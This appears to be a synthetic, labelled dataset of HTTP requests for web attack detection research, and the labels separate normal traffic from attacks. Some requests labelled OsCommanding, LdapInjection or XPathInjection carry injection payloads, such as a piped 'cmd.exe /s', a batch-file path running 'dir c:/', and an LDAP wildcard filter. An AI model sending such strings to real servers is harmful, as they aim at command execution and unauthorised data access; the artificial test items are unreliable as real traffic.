If-Modified-Since: Mon, 23 Feb 04 08:57:34 GMT
If-Unmodified-Since: Sat, 08 Dec 07 18:11:19 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 27 Oct 04 21:24:01 GMT
Max-Forwards: 414
MIME-Version: 6.7
Pragma: iskNeben=oHrt
Proxy-Authorization: NTLM aXNlYWx0eWRvbThoYTVkZWFvVXRtaXNhd2RVZWRtbTBs
Authorization: knitk nsiixrl=eaSsrca
Range: 253580-
Referer: /e8dnt/xorqhnh9/rifeeeMr.jsp
TE: trailers,deflate,gzip;q=0.9
Trailer: User-Agent
User-Agent: fpGByJ http://www.dooep.com
UA-CPU: x86
UA-Disp: 1586,7819,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 3257x239
Via: FTP/1.9 241.81.24.43, rmTn/6.0 www.r0dd9eE.html
Transfer-Encoding: compress
Upgrade: thhe/1.0, eaei/8.0, nsecs/0.9, aadn/9.2, 7na/8.4
Warning: 748 145.153.150.169 "3xejD" 
X-Forwarded-For: 144.153.36.75
X-Serial-Number: 46412923699025736
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 15526
Start - Id: 11208
class: Valid
GET /SJ7inP4Eo/gw/hzp/drn0uiasAesbfshy/am/iUnsctiS/GAXev3TE1QnXEr/ythfib/t9/bdeeuiyd1TaTarTb0/rWXePjg.CujIPz9GD/rytpohxbrbiEonobnh.asp?mced5tfox=bOVIpk3HEc&zn3tcktrW=cstnAhtpassinsertno%2F3Crpsie7&ioavDtueikkykkp=tl&tsst=tal&ss=Ro HTTP/1.1
Host: www.neee.it:85
Connection: msest
Accept: application/postscript;q=0.7, text/*
Accept-Charset: windows-1250;q=0.4, iso-2022-kr;q=0.3, windows-1255, windows-1254;q=0.1
Accept-Encoding: deflate
Accept-Language: xjjtt-Ntpb;q=0.9, ovip-mndee, eDtmNl-yrda, ismbrmsj-aitt;q=0.1, vqi4-Nyioi;q=0.7
Cache-Control: no-cache
Client-ip: 240.243.162.33
Cookie: PFX4varx9h=oE;rdlga=eWHV5k;uhnUoomlde=676871186;ZPJJSG-=si rt&ou?divmtz;savthoa=a-t>e
Cookie2: $Version="8"
Date: Mon, 30 Oct 06 06:33:43 UTC
ETag: W/"TTuVm-_TmsadXoP"
Expect: Eeemyeuo
From: oner40@a3mRaitss.com
If-Modified-Since: Sat, 05 Mar 05 24:14:17 UTC
If-Unmodified-Since: Tue, 02 Jun 09 19:58:04 UTC
If-Match: "mgAmRM@-QI.DwmTdM"
If-None-Match: "E1S.c4Q6WC67bqZ@"
If-Range: Sat, 06 Mar 10 20:40:27 CET
Max-Forwards: 478
MIME-Version: 2.3
Pragma: nUoeKs=1soi
Proxy-Authorization: Digest cnonce="irua"
Authorization: Basic TnV3bjpwY2xoczh3ZQ==
Range: -62895,1183-7810
Referer: http://www.ii6nvr.gov/3ia0stat.jpg
TE: trailers,chunked;q=0.3,deflate
Trailer: From
User-Agent: Mozilla/1.7 (Windows; U; Win 9x 9.3; ee-a5; rv:9.4.3) Gecko/69788001
UA-CPU: StrongARM
UA-Disp: 473,1490,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 1597x0250
Via: turNtn/1.8 www.tnenOn.tiff, FTP/7.7 www.GBwnhu.css, 5.0 www.uxrysuj.png
Transfer-Encoding: nnp87y
Upgrade: soi/9.2, sgsr8/4.6
Warning: 482 www.nt5e.js "raopnnI2epacwex" "Sun, 04 Jan 04 12:41:28 CET"
X-Forwarded-For: 137.203.184.31
X-Serial-Number: 450563801661696804
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11208
Start - Id: 10668
class: Valid
GET /aB7RpgMvds6QwYO/KLZGzV-cmd/lDc/oeeptrenldtdRaoi8hu/zinjsp59u/PstdinK8jFKmeta.jpg?oEubody5=048076&nsc9lPcheeln=wqale&esfsflifnrrotiu=rsnez&Cstiiuda=e%26nsr0sfn+&ihtsuedntoS3nys=90312207&aamIueviu6hij=zttoe HTTP/1.1
Host: 237.254.67.84:80
Connection: close
Accept: image/*;q=0.2, audio/x-wav;q=0.8, image/*;q=0.4
Accept-Charset: iso-8859-5;q=0.5, x-mac-chinesesimp, iso-2022-jp, iso-8859-2, utf-7
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 245.69.51.123
Cookie: rtga1tyiecnjsng=31276;7xveajnn=trrR;ve1acoigiehFi9=tesfoh]naurnr;irttnto=d0Tatg;sr=e8eceqeec]e)m
Cookie2: $Version="99"
Date: Sun, 23 Aug 09 08:15:01 UTC
ETag: "4HW@456wgHvT5yjvX96"
Expect: 100-continue
From: spyi@hEtfsnh.ch
If-Modified-Since: Fri, 04 Jun 04 17:39:13 CET
If-Unmodified-Since: Wed, 27 Jun 07 19:49:39 CET
If-Match: "Z.S1NmR19QxoQe_R"
If-None-Match: *
If-Range: Thu, 18 Feb 10 12:24:45 GMT
Max-Forwards: 41
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: Basic WXRlb2VoaTp3aGk3bnM=
Authorization: Basic b24yaG90czphcnlqNGdObg==
Range: 9268-2780
Referer: /sdjs/tlRbeai.dll
TE: trailers
Trailer: Proxy-Authorization
User-Agent: e@hZTHpU http://www.hmmata.it
UA-CPU: 68000
UA-Disp: 2636,1101,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 513x4808
Via: 4.6 www.nqmm.png, ca9ys/8.6 www.xwee6rsm.js, 8.1 www.dsisy.htm
Transfer-Encoding: gzip
Upgrade: 7wR38/2.1, n4l/0.4
Warning: 628 www.adro.shtml:8 "wytptersn" 
X-Forwarded-For: 224.80.134.105
X-Serial-Number: 45651300212096623
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10668
Start - Id: 10129
class: Valid
GET /whU0bLeTGHg0Tb/yBTdivNafCNsKPX/@da_/sJN3ogH/b2gBBnVVhKCOWAs1Jq.exe?echoRsock_stream.g5JbuKsN=87&OrBfY0HiHOS=49 HTTP/1.0
Host: 65.132.4.242
Connection: close
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: *
Accept-Language: auxPnx-o;q=0.7, oteRI-dnecte, ert-lujwtO;q=0.5, psciiAbk-o
Cache-Control: lrust='ecrtxbgt'
Client-ip: 129.44.155.39
Cookie: tioubiarw=5;siedae7n4aof=t<ee;if=o4qw9O93So6Y
Cookie2: $Version="9"
Date: Sun, 22 Nov 09 07:38:18 CET
ETag: "HUlhuKB5hI9UJT."
Expect: jpgrt=9vdtd;nsh5uen=mOEto
From: tooao@trne6cted.it
If-Modified-Since: Mon, 26 Mar 07 21:42:04 GMT
If-Unmodified-Since: Tue, 23 Dec 08 14:16:35 CET
If-Match: *
If-None-Match: "DIGOXHHHBvu8Om-@Sybi"
If-Range: Sat, 25 Mar 06 06:03:03 CET
Max-Forwards: 7
MIME-Version: 0.7
Pragma: 2n=maSaTz
Proxy-Authorization: irimMo rnefpib=0rSnos
Authorization: Basic MmxBTjk6dG90czdocGw=
Range: 71-522950,861-935707,-683
Referer: /0eeeciss/tcue.conf
TE: trailers,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: nabnd/9.5.5.0.3
UA-CPU: x86
UA-Disp: 7262,260,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 012x3228
Via: 2.6 202.208.106.183
Transfer-Encoding: ntaneU; yrrsnipt=aornsrd
Upgrade: oameu/8.0, bsste/1.0
Warning: 709 www.thyute.gif:470 "H9teuuierrbdaEh" "Tue, 01 May 07 18:39:54 UTC"
X-Forwarded-For: 175.87.104.128
X-Serial-Number: 17458488534617
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10129
Start - Id: 42825
class: OsCommanding
PUT /gEawu/dTnASb4D/frhg/eJb1POcGH/hLysa/Vp6QH7fF7Vp/_V1V6V3FEa/PPXphpEnicYgrL/dlns4taptegsyeptiL/eY.E.js? HTTP/1.0
Content-Length: 316
Content-Language: i2yrrw,eninnEa
Content-Encoding: identity
Content-Location: /ei5h6pR/mesblse/u8oA/dtcs3.css
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 26 Jan 05 05:54:57 UTC
Last-Modified: Sun, 11 Nov 07 10:33:45 GMT
Host: 233.4.138.214
Connection: keep-alive
Accept: audio/*;q=0.6, image/*, image/*;q=0.7
Accept-Charset: euc-cn;q=0.2, x-mac-chinesesimp, utf-7
Accept-Language: ktb-tsho5d;q=0.4, bEam-hoM6, t-r17, rSbn-gt;q=0.7, s-toSyk5r
Cache-Control: no-cache
Cookie2: $Version="72"
Date: Tue, 03 Aug 04 24:03:51 CET
Expect: eduse=nsi1ai;qo2at
If-Modified-Since: Thu, 01 Mar 07 17:47:42 GMT
Max-Forwards: 1
Pragma: no-cache
Referer: /htedz8r/rnhn/avxtp/Aeedmoad.css
User-Agent: sffjm0 http://www.arnroD.it
Transfer-Encoding: psjtm

htacceszLopenbautoexec=ottihmsaxnftpke&s2rnrfi=tQPs0E1l&0dictmpwsuGo3=nyBU3V&oAVQworjN3F1m=pr8stdinemnlc(e&wtSgshhox8d=sC0MmyE&4gseamStnEa=whlkktiootE18pmZl&7.XB0Hu5=etcub9acopyaiobject|]&err=7&uafSHdh=111.85.138.203|    cmd.exe /s&ssfmey=ow.9dK7B4UU&Ach5wf=joOehrnEnRi&koxlecAT5cdntoW=Eh&oot3lthosNn=edutc

End - Id: 42825
Start - Id: 23529
class: Valid
GET /8SgfGghomeGi/nerueDest/4iTYGSDSHkER/e8nwii/esaItatxusEon7.htm? HTTP/1.0
Host: www.serEa.ch
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: x-mac-turkish;q=0.8, iso-8859-8-i, iso-8859-5;q=0.6, windows-1255, x-mac-japanese;q=0.9
Accept-Encoding: deflate, gzip
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 212.119.130.89
Cookie: aeertrcl=9ituhu9Jltofd;easyuLo4wqL=eloecceyoe;ap4rern=1079
Cookie2: $Version="254"
Date: Mon, 17 Nov 08 09:37:40 CET
ETag: W/"wvOjx88g0VAF5dd7MMg"
Expect: ksdnis=ef4r;otk5abdh=easp
From: sateEoa@mrewwclz.be
If-Modified-Since: Wed, 26 Oct 05 24:34:21 UTC
If-Unmodified-Since: Mon, 16 May 05 01:02:27 CET
If-Match: "zWbk-d1WQgXu3Gij"
If-None-Match: "vP77DpaddxXOgpg"
If-Range: *
Max-Forwards: 96
MIME-Version: 2.4
Pragma: tnTgs3T7='Ot'
Proxy-Authorization: Basic ZWVmRDg6ZWhtMW5l
Authorization: Digest realm
Range: 8-461044,5-
Referer: /nipUi/1cMtUe/ncs4cnt.pdf
TE: trailers,trailers
Trailer: Referer
User-Agent: Mozilla/1.4 (Windows; U; Windows NT 7.1; ie-lh; rv:3.8.6) Gecko/10035243
UA-CPU: PowerPC
UA-Disp: 5870,6963,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 4426x0282
Via: FTP/8.5 www.mdea7ixr.htm, 3.6 www.aucnALey.css
Transfer-Encoding: identity
Upgrade: 4tosn/0.6, 5losm/2.1, she/3.0, oa5ds/6.2, 0eepe/4.0
Warning: 316 www.deemx.htm:8305 "btsydnansow" 
X-Forwarded-For: 91.244.254.254
X-Serial-Number: 467341
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 23529
Start - Id: 26338
class: Valid
GET /oiframeXti-yjF6QClz/adOagtjitO3.js?ietotasRoi=05943&rd=84910&uvlessqs=lwrrlogtabs&aetGetoaassob6=74929690&o6aeutahvf=Rp+td&5Iid4etsagtRpao=3hAhTaW&erDiit=62252&iA=awheres%2Bv&ndrzwoosng=o3Prk5RX37e HTTP/1.0
Host: 14.133.249.190
Connection: keep-alive
Accept: application/rtf;q=0.8, application/*
Accept-Charset: iso-8859-15, us-ascii, big5;q=0.6, euc-cn
Accept-Encoding: 
Accept-Language: eviftt8t-nh5arm;q=0.0
Cache-Control: no-transform
Client-ip: 20.37.110.252
Cookie: l09e4hefb7=7302770;LdeK=blsrGR;Sodoidr=and;97BmochapLO@-T=hqe45rAxc/t
Cookie2: $Version="378"
Date: Sat, 01 May 04 04:36:09 CET
ETag: W/"B9apA69xetbtlxTa"
Expect: roudurt
From: gitotesj@ijetLdns9r.st
If-Modified-Since: Tue, 17 May 05 12:35:48 CET
If-Unmodified-Since: Mon, 03 Sep 07 06:56:00 CET
If-Match: "o8B11kNtq3hgTFGDWK1o"
If-None-Match: "MSQiN43t9TsK1M.f4"
If-Range: Wed, 28 Jun 06 03:01:03 CET
Max-Forwards: 642
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: Basic bmVyM2J1cjppRWlI
Authorization: Basic M2pkSWwyYWU6a2JlaHNvbGg=
Range: -954,195324-0
Referer: http://rveRutit.fr/chea3/8londb/hnmp2j6.gif
TE: gzip;q=0.0,deflate;q=0.2,trailers
Trailer: Pragma
User-Agent: ocj4b8 http://www.yksn.fr
UA-CPU: StrongARM
UA-Disp: 417,8223,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 917x537
Via: ssSi/3.3 0.229.114.55, izord/7.4 www.81mk.htm, 3.2 84.65.223.7
Transfer-Encoding: knera; i4tnI=dc9iopt
Upgrade: 9joysm/9.5, ucehec/7.9, nRtrye/6.5
Warning: 815 www.rbtyila5.css "ciOtmopyFf" "Tue, 22 Jan 08 03:00:01 CET"
X-Forwarded-For: 113.183.151.252
X-Serial-Number: 8870435800888322
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 26338
Start - Id: 2270
class: Valid
GET /ena5peotoll/nqsr/rV@Q8Awp-7K-BFSyC/yasebEs/teUkehhsfno/iwtCD_l0oydfu-n3QB.html? HTTP/1.0
Host: 188.198.7.103
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: hlbm3n-nanwca, e1to5-vMEh;q=0.6, s79u-sf3t4
Cache-Control: no-store
Client-ip: 111.99.151.212
Cookie: 5efbb=714619662;iNa=tlaLAz;tes8tdgmewr3=7868;dlnstr=%t cb;letrzCrhqroontn=neat
Cookie2: $Version="88"
Date: Mon, 17 Jan 05 07:36:26 GMT
ETag: "czBkLOu.NNn9-8RH"
Expect: 100-continue
From: oniNcb@l92ecsed.it
If-Modified-Since: Thu, 29 Apr 10 06:27:20 CET
If-Unmodified-Since: Fri, 25 May 07 13:24:02 CET
If-Match: *
If-None-Match: "8wTXDti6MY5I4SAK"
If-Range: Sat, 18 Aug 07 18:04:05 UTC
Max-Forwards: 461
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Digest username="hheA"
Authorization: NTLM aXhlcjJhTGVlZ2VvbmVpcWtuYWJnOXJvb2VvZXRvYXRBZQ==
Range: -458438,6075-5448
Referer: /taqtAisl/at2uttz.txt
TE: trailers
Trailer: Accept
User-Agent: Mozilla/7.7 (Windows; U; Win98 3.5; oa-2u; rv:7.2.7) Gecko/40097386
UA-CPU: StrongARM
UA-Disp: 006,895,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 910x667
Via: FTP/5.9 www.n5n5l.jpeg:116, 5.7 www.5hhi4il.htm, 6.0 www.8iBt4.shtml
Transfer-Encoding: deflate
Upgrade: hnn/7.3
Warning: 901 www.otieo.jpeg:79 "bTRphwcd" "Sat, 18 Dec 04 03:27:02 CET"
X-Forwarded-For: 211.5.1.135
X-Serial-Number: 61486796053346804
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 2270
Start - Id: 7933
class: Valid
PUT /3vfFTdo3rauWl/stylej9x@KQL8V.sh? HTTP/1.1
Content-Length: 66
Content-Language: g,h1eh,me
Content-Encoding: deflate
Content-Location: http://ohhi.cz/mEfyt5t/syqasge.php3
Content-MD5: ZGppdG9vZXRlTnNiaWVlVQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 13 Aug 08 20:17:23 CET
Last-Modified: Tue, 07 Sep 04 20:17:33 GMT
Host: www.fssatQ.uk
Connection: close
Accept: application/zip;q=0.8, application/*;q=0.4
Accept-Charset: euc-cn
Accept-Encoding: deflate, deflate;q=0.3, gzip
Accept-Language: wt-t;q=0.8, aOaeohi-nE;q=0.5, a-cufainiw;q=0.2, o5h-wzN;q=0.2, 4tc-gde;q=0.7
Cache-Control: max-stale
Client-ip: 12.49.235.209
Cookie: holR2t=lY3exerF;dntefytsdnii=6
Cookie2: $Version="38"
Date: Thu, 06 Aug 09 08:14:58 UTC
ETag: W/"aYmJ_-S6vZL-dbRgZ"
Expect: teybilAS
From: 5noeSsf@aurbuNrblc.org
If-Modified-Since: Tue, 24 Jan 06 07:24:39 UTC
If-Unmodified-Since: Wed, 29 Aug 07 02:20:44 CET
If-Match: *
If-None-Match: "-_J5QUcl1zwxKIt"
If-Range: *
Max-Forwards: 790
MIME-Version: 9.1
Pragma: af=rrhRh5z
Proxy-Authorization: NTLM M25ldXB0cU5BbmM1N3RhdXVyZ2FoYjRsM3N0aHRvV2VBdHZjdWVzSW5lc2plTmVl
Authorization: NTLM dXR1QWRhbGFibmllaXZpcm50cmFhUmJzbG5oY2lhYWxvOHQx
Range: 671-64,-9902
Referer: /toinO/ie5hoDea/rLnide58/ivop/dez5g0o.fgf
TE: trailers,trailers
Trailer: Upgrade
User-Agent: itqamlztmrSoesateeoo
UA-CPU: Sparc
UA-Disp: 828,669,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 3690x874
Via: 2.7 57.87.6.248
Transfer-Encoding: compress
Upgrade: 1Zh/3.5, C8i/6.8, I4m/0.2
Warning: 376 www.Ae5dcnr.gif "8yaneahUte" 
X-Forwarded-For: 179.17.241.44
X-Serial-Number: 534170749
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

me0hqPafrd=Leeaae&f03.netcat=ne0oCtc6&eoertgs8eini= tmnbll4Tiew'

End - Id: 7933
Start - Id: 37936
class: LdapInjection
GET /rmV4Cj/kLp9KE@bQcmGUSk/lW/sVtW5AHfTfJBYNT/c64rJH9aqOK32OY1/pimJnwiMOawy4uussldc/t4PJmV6H/nNca/mtaeeyf.htm?htio0aamoto=ee0nn%29%28++++%7C+%28ss0e%3D*%29&Vade1=cma&wEpnbi=qKeiRQv HTTP/1.1
Host: www.lnsM2.org
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-greek;q=0.0
Accept-Encoding: *;q=0.9
Accept-Language: l-sh
Cache-Control: no-store
Client-ip: 140.12.39.241
Cookie: eeerjyaa=08252
Cookie2: $Version="6"
Date: Wed, 22 Jul 09 07:24:55 GMT
ETag: W/"JIaiNtCmlEs.7pkMV8yn"
Expect: Rna7leoD
From: heal@ehrTn.gov
If-Modified-Since: Tue, 20 Apr 04 05:01:40 UTC
If-Unmodified-Since: Tue, 28 Aug 07 18:17:04 UTC
If-Match: *
If-None-Match: "9_-htGGY-ZI9ZD_nMOaJ"
If-Range: Tue, 19 Sep 06 13:15:13 CET
Max-Forwards: 009
MIME-Version: 8.6
Pragma: 8r=l
Proxy-Authorization: Basic aGVuQXQ0aG86c2xweGg0bmU=
Authorization: Basic TGFxZ2k6eWRoMA==
Range: 92-
Referer: /ennh/roDeaea.mpg
TE: trailers,trailers
Trailer: Upgrade
User-Agent: s44BK3d http://www.hrss7.cz
UA-CPU: MIPS
UA-Disp: 472,2226,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 334x8610
Via: HTTP/0.1 www.lspeuP.html, HTTP/3.6 www.napI2nwr.js, HTTP/8.3 www.n6i5ns.jpg
Transfer-Encoding: identity
Upgrade: vtsi/8.4, niogL/5.5, sra/2.0
Warning: 299 www.dnpee.html "si779reU" "Mon, 02 Feb 04 01:33:32 UTC"
X-Forwarded-For: 143.12.94.194
X-Serial-Number: 03021
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37936
Start - Id: 49999
class: XPathInjection
PUT /Lb_deleteoWL/icyigdrnsA.jpg? HTTP/1.1
Content-Length: 75
Content-Language: l,g
Content-Encoding: gzip
Content-Location: /need0Ds/rldpm/oogp/elbfyfb.sh
Content-MD5: bmlyNlR0OWNwZWFJc25yZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 13 Jul 09 19:07:05 GMT
Last-Modified: Thu, 04 Feb 10 17:30:08 CET
Host: 103.28.176.40:1
Connection: close
Accept: text/html, application/*;q=0.3
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: ruthmo-oieat;q=0.6, o8saAj-dWSd;q=0.7, L-vstolwlb;q=0.5, 7Th9T-ltezn
Cache-Control: no-store
Client-ip: 177.9.17.154
Cookie: jTpVKLyJR=Udcatt4icqn;8qoYtto=tsfi;siw= olw;rLXhaving_chavingaetcI=72
Cookie2: $Version="575"
Date: Sun, 04 Feb 07 01:41:24 GMT
ETag: "TUj8p7dHypWCUyG29"
Expect: ceuhtats
From: etjd@onalE.be
If-Modified-Since: Mon, 11 Oct 04 22:53:33 GMT
If-Unmodified-Since: Sun, 01 Jul 07 13:18:09 GMT
If-Match: "X_JEa3J6PrqCTWOqUg"
If-None-Match: *
If-Range: Sun, 31 Oct 04 02:54:31 UTC
Max-Forwards: 9
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: egErr TfEaua=iOrh
Authorization: Basic dGFwcHMwdmQ6QXNkc2U5ag==
Range: -850,-93,-844
Referer: /iMm0/niuoben/sreaV.mdb
TE: deflate
User-Agent: (i    < count(ueacr/child::text())    and   j    <  count(add/child::comment())     and    k  <   count(zsj/child::*)  )
UA-CPU: x86
UA-Disp: 5539,6840,32
UA-Pixels: 957x1532
Via: FTP/9.8 191.115.53.215, 4.9 www.tsHe.js:706
Transfer-Encoding: compress
Warning: 398 166.91.243.88:2399 "rnedr7tea5aeoubom" "Mon, 21 Jun 04 14:41:58 GMT"
X-Serial-Number: 7920080126086879316
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

5r2o9arpo=crk(tn~l&ewlos=8iO5x8XudvE&5dS8includeyMHXpu=asef2tbotweurev6

End - Id: 49999
Start - Id: 20630
class: Valid
GET /efnfonlqaved/utts/itmOEezcaSao2eo/1Nrioa/yAdMdc/hQ/tM@Y1_r13bu8/eqL@Si-Jj@L/g42/SuTDz/aomaeseinnimIee.jsp?4imhaee=tgrbunftnoa&iM=o&erlxueqdo=46059412&OstdinK57Sboot.iniVtmp0=9695465&ceynainUiip=%28siu9exec0xenQtC+t5system%7Ce&ehErq6rye9ni=7&f1hEcals=tS2hbiyi&0dr=753&he=bdiorp75iniioso&h5etrao6ien=+aDe&k1geao0edeeApaw=+rHrb&havingnZvnX7rs=7&6tNaewf=306970556 HTTP/1.1
Host: 77.229.77.9
Connection: keep-alive
Accept: image/gif;q=0.1, audio/basic, image/*
Accept-Charset: cp-950;q=0.3, iso-8859-7
Accept-Encoding: 
Accept-Language: Hk1r8rg-0Er, of-ct2v
Cache-Control: no-transform
Client-ip: 242.209.113.208
Cookie: autoexecsor1Z=177;rdade=in]iEateq=nN$c t;ismnlNhunb6yae=HteH;cir7sFtjnnlfhu=~i[escripth5[ mni;shsereiYylaKn=dhn
Cookie2: $Version="808"
Date: Thu, 29 Apr 04 13:08:00 GMT
ETag: "SmAzF.gyYce_XQcLq"
Expect: 100-continue
From: hims9lO@pelsineh9.it
If-Modified-Since: Tue, 17 Feb 04 04:03:01 UTC
If-Unmodified-Since: Sat, 01 Sep 07 12:18:18 GMT
If-Match: "8zEZiswhZfe1X4MT"
If-None-Match: *
If-Range: *
Max-Forwards: 65
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: sRah gaho=eeosctBp
Authorization: Basic dWFuZWkyeGk6c2FudGo=
Range: -25838,-884476
Referer: http://www.euuiMo.be/sAiar.cfm
TE: chunked
Trailer: Date
User-Agent: iQpJU6_ http://www.rcewned.fr
UA-CPU: 68000
UA-Disp: 491,773,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 3710x9582
Via: 3.6 www.0s0ip.html
Transfer-Encoding: Mtinu
Upgrade: doTsa/2.7, brr8a/3.0
Warning: 860 www.Pz9Tes.png "csrehlretdegSt" "Wed, 24 Jun 09 06:42:44 UTC"
X-Forwarded-For: 240.52.92.34
X-Serial-Number: 999844116491308
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20630
Start - Id: 29324
class: Valid
GET /mC_XGa@3.jsp?WsM5hisee=hcg2Oc0A.7M&haer=hrSooroeloiai&2Gvdocumentt7A7Bhomex2=7&PmrmGIX0d_4=cAEug3&9gosakuayLyP=iLD7Ae4qYqds&rcppfhN=bpl3i HTTP/1.1
Host: 179.224.180.236
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: x-mac-chinesesimp;q=0.7, iso-8859-8;q=0.6, windows-1252;q=0.4, windows-1257
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=1
Client-ip: 152.42.80.93
Cookie: 9tsotsrdpdcej=nSU9;aoaramNus5ehi=yaboot.inii(;teSgosite1qsm=6007187575;3hielpsErO3=||
Cookie2: $Version="3"
Date: Tue, 04 Aug 09 09:02:37 CET
ETag: "RIxUrX9KiKQwwV2ONBI"
Expect: 100-continue
From: yttt5iy@rcto.com
If-Modified-Since: Mon, 12 Jun 06 16:49:01 GMT
If-Unmodified-Since: Fri, 20 Aug 04 22:32:56 UTC
If-Match: "fHe3tVlLRuOBE4y@uE@x"
If-None-Match: *
If-Range: "a-A0iDIFbbSO6@3-SEUP"
Max-Forwards: 70
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: NTLM aGdmeUVjdG1SZHRpNXRldWVhbm11b2NoN3JuaXRjdXVyZW9l
Authorization: nsfit shjalotr=rhm8dbe7
Range: 549983-,-11
Referer: /caanttSo/utoluiwo.dll
TE: chunked,gzip,deflate
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.2 (X11; U; SunOS sun4u 4.2; uo-a2; rv:2.5.7) Gecko/97021384
UA-CPU: MIPS
UA-Disp: 575,351,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 553x667
Via: FTP/1.1 98.155.72.134
Transfer-Encoding: identity
Upgrade: eeee/3.5
Warning: 707 229.233.88.113 "toegchfersr2gftmiE" "Sat, 27 Jan 07 13:21:51 CET"
X-Forwarded-For: 4.80.245.104
X-Serial-Number: 892680378227754
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29324
Start - Id: 44430
class: OsCommanding
GET /scripts/file.bat" "& dir c:/ .exe? HTTP/1.0
Host: 236.89.249.152:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ye-dMihj;q=0.8, h-lheee3u;q=0.5, rleselIe-sakp, H-nnuety2q, nt37e0tl-o2ut4;q=0.8
Cache-Control: min-fresh=368
Client-ip: 27.105.36.250
Cookie: s7Eehtacces=qnoe0dIEgro/\U;v78qeOG=0it;hcavT8pilWaqT=u$l$hotmailseusrhks;rltnrs99sloatea=xsEniw6L
Cookie2: $Version="74"
Date: Thu, 05 Feb 04 03:21:40 GMT
ETag: "2tnZ37xD4wGUw-x"
Expect: 100-continue
From: unh1Ohh@nhsboy.biz
If-Modified-Since: Sat, 02 Apr 05 06:48:20 CET
If-Unmodified-Since: Fri, 28 Jul 06 07:38:33 GMT
If-Match: *
If-None-Match: "ohsyFQjZoPfd62U"
If-Range: Wed, 13 Jan 10 11:33:43 UTC
Max-Forwards: 0
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: NTLM Y0xsZGlpbnRudWkyaTIxVW8yZnRla2lpdEd6cG9yZXN0
Authorization: ltsapd bGeI7t=ierdreT
Range: 6-02287,72753-
Referer: /iuse4syr.txt
TE: deflate;q=0.1,chunked
Trailer: Accept-Encoding
User-Agent: A8oabslte (6TdC-rT; dVN_RM; epw609cXJ; 2Dxy_P76; 40CdbWR83)
UA-CPU: Sparc
UA-Disp: 712,4716,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 053x237
Via: 8.5 66.3.123.210, 2.7 249.88.93.53
Transfer-Encoding: gzip
Upgrade: esoj5m/0.8
Warning: 041 www.nmtu.css:96410 "tmhhadncfjtereqA" "Mon, 28 Sep 09 17:32:04 UTC"
X-Forwarded-For: 130.4.183.226
X-Serial-Number: 42253
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44430
Start - Id: 26209
class: Valid
GET /2tlnheignstlwEoEoxB/tchodnbnmanedase/e9gU-AFGCxyZzJ3MxH/pvkC8H9NSL/iyCIQ/fmio/esritsir/wpdd/@3Fay3Z/rk.jpeg?Ebx=1561170523&3mdocument2B7winntNl=ognh17wj1s&ypslennic=LqBnawa&crheiorrd0eleta=ewf%26smetaralwnewsoi+l+I HTTP/1.0
Host: 61.230.185.189
Connection: leiun
Accept: image/*
Accept-Charset: *
Accept-Encoding: gzip
Accept-Language: bek-ir;q=0.5
Cache-Control: max-age=50724
Client-ip: 38.85.188.181
Cookie: phpinDKMsjdocumentV0aK=oe&y;al1rneeaez=14;8ae0iarr=ia;Or5F=nvW-Zu;eti2=Aia3huyttTituuirnh;BolCS_DY=17
Cookie2: $Version="29"
Date: Mon, 01 Mar 04 08:24:57 CET
